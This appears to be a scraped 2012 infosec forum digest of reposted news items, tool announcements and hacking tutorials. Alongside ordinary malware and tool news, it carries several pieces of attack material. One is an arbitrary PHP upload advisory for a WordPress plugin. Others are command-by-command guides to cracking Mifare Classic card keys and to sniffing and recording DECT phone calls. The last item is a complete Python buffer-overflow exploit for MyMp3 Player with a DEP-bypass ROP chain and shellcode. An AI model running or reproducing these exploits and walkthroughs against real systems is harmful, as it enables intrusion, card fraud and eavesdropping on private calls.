Wubi

Malware attack spread as email from your office's HP scanner by Graham Cluley on July 24, 2012 | Be the first to comment Filed Under: Featured, Malware, Spam In these high-tech times, scanners and photocopiers aren't just dumb machines sitting in the corner of the office. They are usually connected to the corporate network, and - in some cases - can even email you at your desk to save you having to wear out your shoe leather. And it's precisely this functionality that we have seen cybercriminals exploiting today, pretending that their malicious emails in fact come from an HP scanner inside your organisation. Here's a typical example of the emails we have been intercepting at SophosLabs: Subject: Re: Scan from a Hewlett-Packard ScanJet 4952740 Message body: Attached document was scanned and sent to you using a Hewlett-Packard I-56919SL. SENT BY: SHERRIL PAGES: 7 FILETYPE: .DOC [Word2003 File] As you'll see in the next example, the precise wording (the names and numbers used) can vary from email to email. But each of the emails has the same file attached - HP_Document.zip. So, what's in the ZIP file? hp_page-1-19_24.07.2012.exe Clearly that's not a scanned-in image - it's executable code. In fact, it's a Trojan horse called Troj/Agent-XDD, capable of infecting your Windows PC and putting your computer data at risk. Here's a list of some of the different subject lines we saw in this spammed-out malware campaign, in the just the course of a few seconds: We've seen malware spread as scans from HP devices in the past, but there has been a notable wave of malicious code spammed out using the disguise today - so be on your guard. If you are one of the many people seeing this malware attack in your email today, please do not click on the attachment even if you are waiting for a scanned-in document to be sent to you. Instead, simply delete the email and your computer will be safe. Sursa: Malware attack spread as email from your office’s HP scanner | Naked Security

July 24, 2012 By Black Evader can be used to test your organization’s network security devices against Advanced Evasion Techniques that are increasingly used in sophisticated and targeted cyber attacks Evader launches a set of AETs against a tester’s own next generation firewall (NGFW), Intrusion Prevention System (IPS) and Unified Threat Management (UTM). As a result, organizations can understand whether these AETs pose a threat to their own networks and digital assets. Features of Evader Launch controlled AET-borne attacks at your own defense technology Tweak evasions and combinations, and instantly see if you are successful The Evader includes a set of AETs that has gone through the CERT vulnerability coordination process that began two years ago. The purpose of Evader is to provide hard facts about AET readiness of an organization’s own security devices, support decision-making and raise an organization’s security level. Advanced Evasion Techniques (AET) Discovered and reported by Stonesoft since 2007 Stealth cyber attack methods that bypass network security Simultaneous execution on multiple protocol layers Capable of changing dynamically during an attack Evasion combinations and modifications Not satisfactorily tested in published security device lab tests Despite most security vendors promising 100 percent protection against evasion attacks, hackers are still breaching some of the world’s most secure networks using more advanced methods like AETs. AETs are used to attack networks by combining several known evasion methodologies to create a new, previously unknown and dynamically changing technique that is delivered over several layers of a network simultaneously. This allows the attacker to successfully deliver any exploit, malicious payload or code to a target host without detection. Download Evader: Evader – Evader Sursa: PenTestIT — Your source for Information Security Related information!

WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload [table=width: 500, class: grid] [tr] [td]EDB-ID: 20083[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Chris Kellum[/td] [td]Published: 2012-07-24[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] # Exploit Title: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability # Date: 7/23/12 # Exploit Author: Chris Kellum # Vendor Homepage: http://mondaybynoon.com/ # Software Link: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip # Version: 0.5.4.4 ===================== Vulnerability Details ===================== Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format: filename.php.jpg Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed. In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access. Example: /wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/ However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload. =================== Disclosure Timeline =================== 7/13/2012 - Vendor notified 7/23/2012 - Version 0.5.4.6 released 7/23/2012 - Public disclosure

Description: In this video you will learn how to Secure your Linux Server using AIDE tool this is live cam recording but interesting video. Aide : - AIDE Advanced Intrusion Detection Environment is a file and directory integrity checker. It creates a database from the regular expression rules that it finds from the config file. Once this database is initialized it can be used to verify the integrity of the files. It has several message digest algorithms that are used to check the integrity of the file. All of the usual file attributes can also be checked for inconsistencies. It can read databases from older or newer versions. See the manual pages within the distribution for further info. AIDE - Advanced Intrusion Detection Environment Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: This video is all about HTTPS and SSL how it is working and Difference between a public key and private key. For more information about how to configure etc Please visit this site. Using Client Certificate Authentication with IIS 6.0 Web Sites Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Grum botnet briefly revived, killed by authorities yet again Summary: Grum, the third largest known botnet, was taken down last week. Those behind Grum attempted to bring it back this week, but security researchers stepped in and put it back into the ground once again. By Emil Protalinski for Zero Day | July 24, 2012 -- Updated 13:54 GMT (06:54 PDT) Last week, authorities took down Grum, the world's third largest botnet at the time. The cybercriminals responsible for the malicious network attempted to bring it back yesterday, but thankfully officials stepped in and killed it again. In the absence of any built-in fallback mechanisms, Grum's botnet herders paid the Ukrainian ISP SteepHost to remove the null route on three Command and Control (C&C) servers. FireEye suspects the cybercriminals paid a large amount of money in order to get access to the servers. After hours of negotiations, FireEye managed to convince SteepHost to shut down the CnCs once more. As you can see in the chart above, there was a short burst of spam sent by Grum during this time, but activity has once again been reduced to nothing. Grum originally had four C&C servers. First Dutch authorities took down two of the ones in the Netherlands, then the server in Panama fell, and although six new ones were setup in Ukraine, authorities moved quickly to kill those as well as the remaining Russian one. While an attempt was made to bring back some of the Ukrainian servers this week, I think it's safe to say that Grum is as good as gone since the main servers cannot be recovered. "A strong warning has been given to SteepHost that if something like this happens again, a complaint will be filed with their upstream provider which might de-peer them off the Internet," a FireEye spokesperson said in a statement. "Alternatively their whole subnet can be blacklisted which could cause some serious damage to their business." Sursa: Grum botnet briefly revived, killed by authorities yet again | ZDNet

Warning: Battery-saver app on Android is malware Summary: Cybercriminals have created a fake battery-saving app for Android that is really malware in disguise. The idea is to harvest e-mail addresses for spamming users at a later time. By Emil Protalinski for Zero Day | July 24, 2012 -- Updated 13:09 GMT (06:09 PDT) A new piece of malware is trying to take advantage of poor battery life on Android smartphones. Cybercriminals have created an app that is supposed to reduce battery use, but in reality steals the user's contacts data stored on the device. Symantec, which first discovered the malware, is calling this particular threat Android.Ackposts. Here's the official description Android.Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location. The Trojan may arrive as a package with the following name: BatteryLong.apk. As opposed to using third-party app stores or even the official Google Play store, this app is pushed via Japanese spam e-mail that includes a link to download and install it. Although the messages claim the app reduces battery use by half, the app does nothing to save battery power. It does, however, send the user's contacts data (name, phone number, e-mail address, and more) to an external website for safe keeping. As you can see in the screenshot in the top right, this malicious app only requests two permissions when it installs: "Network communication" (to access the Internet and upload the personal data) and "Your personal information" (to read and acquire the user's contacts data in the first place). The developer may have limited the number of required permissions as much as possible to avoid suspicion. Once the app is installed and launched, a setup screen appears for a second, followed by a message stating that the device does not support the app. That is when the app steals the user's contacts data in the background. The developers of this malicious app are most likely trying to harvest e-mail addresses for spamming purposes. Symantec traced the spam message back to the sender, and discovered that the cybercriminals are also operating various social networking and dating sites already notorious for sending spam. Sursa: Warning: Battery-saver app on Android is malware | ZDNet

July 24, 2012 By Mayuresh Our first post regarding ModSecurity can be found here. A few hours ago, an update – ModSecurity version 2.6.7 - was released. “ModSecurity is an open source, free web application firewall (WAF) Apache module, that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis. ModSecurity employs the following security models: Negative Security Model – looks for known bad, malicious requests. This method is effective at blocking a large number of automated attacks, however it is not the best approach for identifying new attack vectors. Using too many negative rules may also negatively impact performance. Positive Security Model – When positive security model is deployed, only requests that are known to be valid are accepted, with everything else rejected. This approach works best with applications that are heavily used but rarely updated. Virtual Patching – Its rule language makes ModSecurity an ideal external patching tool. External patching is all about reducing the window of opportunity. Time needed to patch application vulnerabilities often runs to weeks in many organizations. With ModSecurity, applications can be patched from the outside, without touching the application source code (and even without any access to it), making your systems secure until a proper patch is produced. Extrusion Detection Model – ModSecurity can also monitor outbound data and identify and block information disclosure issues such as leaking detailed error messages or Social Security Numbers or Credit Card Numers.” Official ModSecurity 2.6.7 change log: Fixed Perl Compatible Regular Expressions (PCRE) mismtach version warning message (Thanks Victor Julien). Fixed explicit target replacement using SecUpdateTargetById was broken. The ctl:ruleUpdateTargetById is deprecated and will be removed for future versions since there is no safe way to use it per-request. Added ctl:ruleRemoveTargetById that can be used to exclude targets to be processed per-request. Download ModSecurity: ModSecurity 2.6.7 – modsecurity-apache_2.6.7.tar.gz Sursa: PenTestIT — Your source for Information Security Related information!

Description: In this video you will learn what is footprinting why we are using footprinting etc. And also you will learn how to start scanning a website and gather information about that website or network. Footprinting : - In simple language footprinting is gathering information about computer and system that is webserver or any kind of system. You can perform lots of security techniques like Post scanning, OS Detection Spidering on the web etc.. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video Liz Vonderheiden (CISSP) talking about Cryptography so in this lacture she will talk about topics like what is crypto, what is a crypto components and what are the security services offered etc .. This is very good video for who don’t understand cryptography and you can start learning crypto after watching this video : ) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

July 24, 2012 By Mayuresh Time to update your Wireshark installations as the world’s most popular network protocol analyzer now has an update – Wireshark version 1.8.1 (stable)! "Wireshark is the world’s most popular network protocol analyzer. It is used for troubleshooting, analysis, development, and education.” Wireshark 1.8.1 official change log: Bug Fixes The following bugs have been fixed: Wireshark crashes on bootp filter. (Bug 7391) Wireshark > 1.4 does not correctly read Association ID for PS Poll packets. (Bug 7429) Radius-EAP broken since 1.8.0 release. (Bug 7430) SNMP incorrectly marks SNMPv3 “discovery” packet as malformed. (Bug 7438) Widgets are not properly expanded in GTK3. (Bug 7377) Find Next Mark duplicated on Edit Menu. (Bug 7445) DVB-CI/CI+: fix offset error in operator_info apdu. (Bug 7468) Unable to correctly identify IEC 61850 MMS packets. (Bug 7488) WinPcap doesn’t install if vcredist_x64 requires reboot. (Bug 7507) The following vulnerabilities have been fixed: wnpa-sec-2012-11: The PPP dissector could crash. (Debian bug 680056) –> Versions affected: 1.4.0 to 1.4.13, 1.6.0 to 1.6.8, 1.8.0. wnpa-sec-2012-12: The NFS dissector could use excessive amounts of CPU. (Bug 7436) Versions affected: 1.4.0 to 1.4.13, 1.6.0 to 1.6.8, 1.8.0. Updated Protocol Support: BACapp, BOOTP, DCERPC SPOOLSS, DVB-CI, H.248, IEEE 802.11, Jmirror, NAS EPS, NFS, PPP, RELOAD Framing, SES, SNMP, XMPP New and Updated Capture File Support: Microsoft Network Monitor Download Wireshark: Wireshark 1.8.1 – Wireshark-win64-1.8.1.exe / wireshark-1.8.1.tar.bz2 Sursa: Wireshark version 1.8.1! — PenTestIT

July 24, 2012 By Mayuresh Our first post regarding OWASPBWA or the OWASP Broken Web Applications Projectcan be found here. A few hours ago, an updated version – OWASPBWA version 1.0 was released! "Open Web Application Security Project (OWASP) Broken Web Applications Project or OWASPBWA is a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost VMware Player and VMware Server products (along with their commercial products).” Official OWASPBWA 1.0 change log: Added new application: WIVET (wivet - Web Input Vector Extractor Teaser - Google Project Hosting) Updated WAVSEP, Mutillidae, Vicnum Created new category for “Applications for Testing Tools”, containing OWASP ZAP WAVE, WIVET, and WAVSEP Major update to User Guide at UserGuide - owaspbwa - User Guide for the OWASP BWA VM. - OWASP Broken Web Applications Project - Google Project Hosting. Removed some other project Wiki pages that were incorporated into User Guide. More improvements to index.html Download OWASPBWA: OWASPBWA 1.0 – OWASP_Broken_Web_Apps_VM_1.0.zip / OWASP_Broken_Web_Apps_VM_1.0.7z Both files contain the same VM! Just that .7zip is smaller in size. Sursa: OWASPBWA version 1.0! — PenTestIT

This article was contributed by MI1. URL : Hack 4 Fun Twitter: Twitter Email : fblubr@gmail.com Contents 1 RFID Cooking with Mifare Classic 2 0x00 - Preface 2.1 Dependencies 3 0x01 - Hardware 3.1 Touchatag - ACR122U 4 0x02 - Software 4.1 ACR122U driver 4.2 Open Source Near Field Communication (NFC) Library /LIBNFC/ 4.3 MFOC -Mifare Classic Offline Cracker 5 0x03 - Dumping & Cooking 6 0x04 – ISIC Issue 7 0x06 – Conclusion 8 0x07 – What's next? 9 0x08 – Thanks 10 0x09 – References & Links 11 0x0A - About RFID Cooking with Mifare Classic DISCLAIMER: The information and reference implementation is provided: For informational use only as part of academic or research study, especially in the field of informational security, cryptography and secure systems As-is without any warranty, support or liability - any damages or consequences obtained as a result of consulting this information if purely on the side of the reader NOT to be used in illegal circumstances (for example to abuse, hack or trick a system which the reader does not have specific authorizations to such as ticketing systems, public transport, University/ISIC cards, building access systems or whatsoever systems using Mifare Classic as core technology) NOTES: This article contain no original research. All the research and implementation was made by other people and communities and is publicly available. We made this two cents just for fun and because we love BackTrack. This is not A-Z guide so try harder! 0x00 - Preface Some of you may have read that the proprietary symmetric key cryptographic algorithm of the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical access control systems (PACS) and contact less payment systems (including tollway and public transportation systems). By some estimates, there are 500 million MIFARE cards deployed worldwide, and the majority of them are MIFARE Classic cards. Mifare Classic is a inexpensive, entry-level chip, based on ISO/IEC 14443 Type A, 1kB or 4kB. Uses 13.56 Mhz contactless smartcard standard, proprietary CRYPTO1 with 48 bits keys. There is no protection against cloning or modifications. Anyone with 50 € reader can use this weakness against your infrastructure. At least one sector is always encrypted with default key. After cracking all keys, hackers are able to change name, students university number, expiration date... This cookbook is proof of concept how easy that can be done. Chosen ingredients: Backtrack | Touchatag starter package Tested on: BackTrack 4 R2, BackTrack 5 Final, (32bit) Dependencies root@bt:~# [COLOR="#FF0000"]apt-get install flex libpcsclite-dev libusb-dev checkinstall[/COLOR] 0x01 - Hardware Touchatag - ACR122U Touchatag is ACS ACR122(U) NFC Reader USB RFID reader. The USB reader works at 13.56MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when used with the Touchatag RFID tags. This product is made by Advanced Card Systems Limited and seems to be available in different layouts but hardware doesn't differ so much. They are all using a PN532 NFC Controller chip and a ST7 microcontroler unit. 0x02 - Software ACR122U driver root@bt:~# [COLOR="#FF0000"]wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip[/COLOR] root@bt:~# [COLOR="#FF0000"]unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip[/COLOR] root@bt:~# [COLOR="#FF0000"]cd acr122u[/COLOR] root@bt:~# [COLOR="#FF0000"]tar -jxvf acsccid-1.0.2.tar.bz2[/COLOR] root@bt:~# [COLOR="#FF0000"]cd acsccid-1.0.2[/COLOR] root@bt:~# [COLOR="#FF0000"]./configure[/COLOR] root@bt:~# [COLOR="#FF0000"]make [/COLOR] root@bt:~# checkinstall -D -y --install Open Source Near Field Communication (NFC) Library /LIBNFC/ Libnfc is the first free NFC SDK and Programmers API released under the GNU Lesser General Public License. root@bt:~# [COLOR="#FF0000"]apt-get install -y debhelper libtool && wget http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz [/COLOR] root@bt:~# [COLOR="#FF0000"]tar xfvz libnfc-1.4.2.tar.gz &&cd libnfc-1.4.2[/COLOR] root@bt:~# [COLOR="#FF0000"]svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian[/COLOR] root@bt:~# [COLOR="#FF0000"]dpkg-buildpackage -rfakeroot[/COLOR] root@bt:~# [COLOR="#FF0000"]dpkg -i ../libnfc*.deb[/COLOR] Check your reader / target with nfc-list. root@bt:~# [COLOR="#FF0000"]nfc-list[/COLOR] nfc-list use libnfc 1.4.2 (r891) Connected to NFC device: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07) 1 ISO14443A passive target(s) was found: ATQA(SENS_RES):00 02 UID (NFCID1): xx xx xx xx SAK (SEL_RES): 18 If your reader is rejected because of the firmware (log message: „Firmware (x.y) is bogus!“) just disable version checking. All you need to do is change ifdDriverOptions (line 55 in Info.plist) to skip version checking like this: root@bt:~# [COLOR="#FF0000"]nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist[/COLOR] ifdDriverOptions 0×0005 Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and ready. MFOC -Mifare Classic Offline Cracker Mifare Classic Offline Cracker is a tool that can recover keys from Mifare Classic cards. Thanks to Norbert Szetei and Pavol Luptak for their attack's implementation. MFOC is utility to compute (crack) all keys (A and to all sectors, providing at least one of the keys is already known. Keys file is the file, where mfoc will store cracked keys. Format of that file is compatible with nfc-mfclassic, so you can then use it to dump the card into file, or write a dump onto the card. root@bt:~# [COLOR="#FF0000"]wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar -xvzf mfoc-0.10.2.tar.gz[/COLOR] root@bt:~# [COLOR="#FF0000"]cd mfoc-0.10.2[/COLOR] root@bt:~# [COLOR="#FF0000"]autoreconf -vis[/COLOR] root@bt:~# [COLOR="#FF0000"]./configure [/COLOR] root@bt:~# [COLOR="#FF0000"]make[/COLOR] root@bt:~# [COLOR="#FF0000"]checkinstall -D -y --install[/COLOR] 0x03 - Dumping & Cooking psscd coordinates the loading of drivers for card readers. It allows applications to access smart cards and readers without knowing details of the card or reader. It is a resource manager that coordinates communications with smart card readers and smart cards and cryptographic tokens that are connected to the system. I prefer start pcscd in foreground (no daemon) with pcscd -f. Then it's time to start mfoc. Use high number of probes, because default number of probes for a key recovery for one sector is 20. Whole cracking could take from 30 minutes to 30 hours. You can also use the -k key parameter, to add a key to the list of known keys, which is being tried against your card in the initial phase. The -k option somehow didn't work for me, so I always compile my known keys directly into mfoc.c Search for “Array with default Mifare Classic keys” Not sure about other countries, but in country where I live keys are the same. Once you have keys from all sectors, you should be able to use RFID-Fu against other cards, which is epic fail. root@bt:~# [COLOR="#FF0000"]nfc-mfclassic --help [/COLOR] Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>] r|w - Perform read from (r) or write to (w) card a|b - Use A or B keys for action <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card) <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional) Or: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extract payload (data blocks) from MFD <dump.mfd> - MiFare Dump (MFD) that contains wanted payload <payload.bin> - Binary file where payload will be extracted Keep in mind that card UID will be not affected (not changed) with this process. Buy some blank card or Proxmark III if that is what you want. If you are now thinking about dumping your electronic wallet right after recharge and when credit comes to zero, writing content back, then please don't do it. What can stop you from doing that? Well, probably only your conscience, but if the card gets blocked in 24 hours after first use then don't complain. Yes, there are online checking and billing systems out there for basic cards. 0x04 – ISIC Issue With ISIC- International Student Identity Card attacker can abuse around ten service not only one. ISIC cards are widely used for entrance, transportation, dining payments and various others services or discounts. According to homepage there are 4.5 million cardholders in 120 countries. Cards should be replaced with more secure types ASAP. It is possible to do much more than that, but sufficient for demonstration let's play a little... At some universities, there is only one entry security check – ISIC. As you can see this is trivial to bypass. We did many tests with public transportation systems and with university systems. Results are all the same – those systems are easily hackable. 0x06 – Conclusion Finally, when will people learn their lesson? Cryptographic algorithms should be public so that they can be scrutinized and tested. Secret algorithms aren’t more valuable because they are secret. Anyone needing a highly secure smart card should make sure there's layered security and not just depend on the chip's encryption. 0x07 – What's next? Since i have access to Proxmark III which is universal RFID hacking tool which can be used for 100% accurate cloning (even UID), i may once write second edition about c00king with Mifare Classic and HID Prox... Arming BackTrack with GSM attack suite? 0x08 – Thanks This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back. 0x09 – References & Links For further reading about this topic please see following: http://www.cs.virginia.edu/~kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf 24C3: Mifare http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf http://www.nethemba.com/mifare-classic-slides.pdf mfoc - nfc-tools - Mifare Classic Offline Cracker - Near Field Communication (NFC) tools under POSIX systems - Google Project Hosting 0x0A - About MI1 is a "full time security enthusiast" with university degree in the field of informatics. Recently focusing his passion to USRP and RFID stuff. Sursa: RFID Cooking with Mifare Classic - BackTrack Linux

This article was contributed by 5M7X. URL : Back-Track.de - German Community Twitter: Twitter Email : 5M7X@mail.ru BIG FAT HAIRY WARNING: IT IS ILLEGAL TO RECORD PHONE CONVERSATIONS IN MANY COUNTRIES. For a list of state privacy laws in the US, check State Privacy LawsState Privacy Laws and http://fjallfoss.fcc.gov/edocs_public/attachmatch/DOC-266204A1.pdf. Contents 1 What is DECT? 1.1 The problem? 1.2 Tested on 2 Installing dedected 2.1 Install from repository 2.2 Install from source 3 Install some additional tools 4 Load the drivers 5 Scan for fixed parts a.k.a. fp (DECT base stations) 6 Ignore phones you don’t want to sniff (e.g. your neighbours!) 7 Record the phone call 8 Decode the call out of the datastream 9 Import the streams into audacity and listen to the calls 10 Clean up / Reload 11 DECT protocol 12 Video: Sniffing DECT phones with BackTrack 5 What is DECT? Digital Enhanced Cordless Telecommunications - Wikipedia, the free encyclopedia The problem? Most vendors don’t implement encryption in their devices so one can sniff it with certain hardware and software. For a previous post on the topic, check: http://www.offensive-security.com/backtrack/sniffing-dect-phones-the-details/ Tested on BackTrack 5 final x86 KDE with kernel 2.6.38 Original Dosch&Amand Type II PCMCIA Card SIEMENS C1 DECT Phones set up in repeater mode NOTE: This is experimental software which is not very actively supported anymore! Installing dedected In order to get dedected installed on BackTrack, you have the choice between: Use dedected from the BackTrack 5 repositories. Compile it on your own if you want to experiment. Install from repository root@bt:~# [COLOR="#FF0000"]apt-get update[/COLOR] root@bt:~# [COLOR="#FF0000"]apt-get install dedected[/COLOR] Install from source This stage is optional for those wanting to build the tools from source code. root@bt:~# [COLOR="#FF0000"]prepare-kernel-sources[/COLOR] root@bt:~# [COLOR="#FF0000"]cd /usr/src/linux[/COLOR] root@bt:~# [COLOR="#FF0000"]cp -rf include/generated/* include/linux/[/COLOR] root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony[/COLOR] root@bt:~# [COLOR="#FF0000"]svn co https://dedected.org/svn/trunk dedected_svn[/COLOR] root@bt:~# [COLOR="#FF0000"]cd dedected_svn/com-on-air_cs-linux/[/COLOR] root@bt:~# [COLOR="#FF0000"]make && make -C tools[/COLOR] Install some additional tools root@bt:~# [COLOR="#FF0000"]apt-get -y install audacity[/COLOR] Load the drivers root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR] root@bt:~# [COLOR="#FF0000"]make node[/COLOR] If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so now! Next, we load the driver: root@bt:~# [COLOR="#FF0000"]make load[/COLOR] Scan for fixed parts a.k.a. fp (DECT base stations) root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux/tools[/COLOR] root@bt:~# .[COLOR="#FF0000"]/dect_cli[/COLOR] If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6 band via the "band" command. Let's enable someverbosity: [COLOR="#008080"]verb[/COLOR] And start scanning for base stations: [COLOR="#008080"]fpscan[/COLOR] After scanning 2-3 times through all channels disable verbosity, and stop scanning: [COLOR="#008080"]verb stop[/COLOR] Ignore phones you don’t want to sniff (e.g. your neighbours!) Start a callscan [COLOR="#008080"]callscan[/COLOR] Now grab your DECT handset and make a test phonecall and wait until you see the phonecall .It is also sufficient if you just get a dialing tone. You should see something like ### found new call on 00 82 31 33 73 on channel 7 RSSI 34 [COLOR="#008080"]stop[/COLOR] Name your basestation if you want: [COLOR="#008080"]name 00 82 31 33 73 stallowned[/COLOR] Dump all found phones: [COLOR="#008080"]dump[/COLOR] Ignore every other phone except yours via the following command! IMPORTANT!!! [COLOR="#008080"]ignore 01 30 95 13 37[/COLOR] Record the phone call Start automaticially recording of every phone call it detects: [COLOR="#008080"]autorec[/COLOR] Now grab your DECT telephony handset and do a testcall. I recommend to call a “time telling serivce” that can be reached over a normal phone number. You should get something like this: ### starting autorec ### stopping DIP ### starting callscan ### trying to sync on 00 82 ab b0 29 ### got sync ### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap ### stopping DIP After you hung up your phonecall the dumping should stop: Decode the call out of the datastream Stop the autorec: [COLOR="#008080"]stop[/COLOR] Decode the audiostream out of the raw dump root@bt:~# [COLOR="#FF0000"]./decode.sh[/COLOR] Import the streams into audacity and listen to the calls Start audacity via "alt + f2" then type “audacity” and press enter. Import the fixed-part and hte portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via File -> Import -> Audio or simply "ctrl + shift + I" . Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav. Play your phone call with the play button: Hint: if you can only hear noise your phone seems to use some encoding/encryption. You can enable the repeater mode in your telephone so it disables encryption and you can test if your setup is working properly. Clean up / Reload If you need to reload the drivers root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR] root@bt:~# [COLOR="#FF0000"]make reload[/COLOR] If you’re finished and want to clean up: root@bt:~# [COLOR="#FF0000"]cd /pentest/telephony/dedected/com-on-air_cs-linux[/COLOR] root@bt:~# [COLOR="#FF0000"]make unload[/COLOR] root@bt:~# [COLOR="#FF0000"]rm /dev/coa[/COLOR] DECT protocol If you are interested in more details of the protocol you can open the .pcap file in Wireshark: Video: Sniffing DECT phones with BackTrack 5 http://player.vimeo.com/video/25027253 Sursa: http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected

MyMp3 Player Stack .m3u DEP Bypass Exploit [table=width: 500, class: grid] [tr] [td]EDB-ID: 20053[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Daniel Romero[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ''' Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP) Author: Daniel Romero Perez (@daniel_rome) Software & Version: MyMp3-Player 3.02.067 Tested on: Windows XP SP3 - ES Mail: unlearnsecurity@gmail.com Blog: unlearningsecurity.blogspot.com Advisor: http://www.securityfocus.com/bid/38835/info Article: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html ''' import os import struct # Buffer Buff = "\x41" * 1024 # ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x0a\x0d\x20\x00' -t c) - 227 bytes ShellCode = ("\xb8\xf8\x16\x8a\x64\xd9\xe9\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x33\x31\x46\x12\x83\xc6\x04\x03\xbe\x18\x68\x91\xc2\xcd\xe5" "\x5a\x3a\x0e\x96\xd3\xdf\x3f\x84\x80\x94\x12\x18\xc2\xf8\x9e" "\xd3\x86\xe8\x15\x91\x0e\x1f\x9d\x1c\x69\x2e\x1e\x91\xb5\xfc" "\xdc\xb3\x49\xfe\x30\x14\x73\x31\x45\x55\xb4\x2f\xa6\x07\x6d" "\x24\x15\xb8\x1a\x78\xa6\xb9\xcc\xf7\x96\xc1\x69\xc7\x63\x78" "\x73\x17\xdb\xf7\x3b\x8f\x57\x5f\x9c\xae\xb4\x83\xe0\xf9\xb1" "\x70\x92\xf8\x13\x49\x5b\xcb\x5b\x06\x62\xe4\x51\x56\xa2\xc2" "\x89\x2d\xd8\x31\x37\x36\x1b\x48\xe3\xb3\xbe\xea\x60\x63\x1b" "\x0b\xa4\xf2\xe8\x07\x01\x70\xb6\x0b\x94\x55\xcc\x37\x1d\x58" "\x03\xbe\x65\x7f\x87\x9b\x3e\x1e\x9e\x41\x90\x1f\xc0\x2d\x4d" "\xba\x8a\xdf\x9a\xbc\xd0\xb5\x5d\x4c\x6f\xf0\x5e\x4e\x70\x52" "\x37\x7f\xfb\x3d\x40\x80\x2e\x7a\xbe\xca\x73\x2a\x57\x93\xe1" "\x6f\x3a\x24\xdc\xb3\x43\xa7\xd5\x4b\xb0\xb7\x9f\x4e\xfc\x7f" "\x73\x22\x6d\xea\x73\x91\x8e\x3f\x10\x74\x1d\xa3\xf9\x13\xa5" "\x46\x06") Nops = "\x90" * 50 ##ROP --> Bypass DEP with SetProcessDEPPolicy ROP = struct.pack('<L',0x77f4c25f) # POP EBX / RET ROP += struct.pack('<L',0x41414141) # JUNK ROP += struct.pack('<L',0xFFFFFFFF) # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF ROP += struct.pack('<L',0x7e810b7e) # INC EBX / RET ROP += struct.pack('<L',0x77f445bf) # POP EBP / RET ROP += struct.pack('<L',0x7C862144) # <- SetProcessDEPPolicy ROP += struct.pack('<L',0x77f45493) # POP EDI / RET ROP += struct.pack('<L',0x77f4108c) # RET ROP += struct.pack('<L',0x77f4567e) # POP ESI / RET ROP += struct.pack('<L',0x77f4108c) # RET ROP += struct.pack('<L',0x58c35ff7) # PUSHAD / RET # Exploit exploit = Buff + ROP + Nops + ShellCode # Create File file = open("exploit_mymp3-player_BOF.m3u", "wb") file.write(exploit) file.close() print ("Your file has been generated successfully!!")

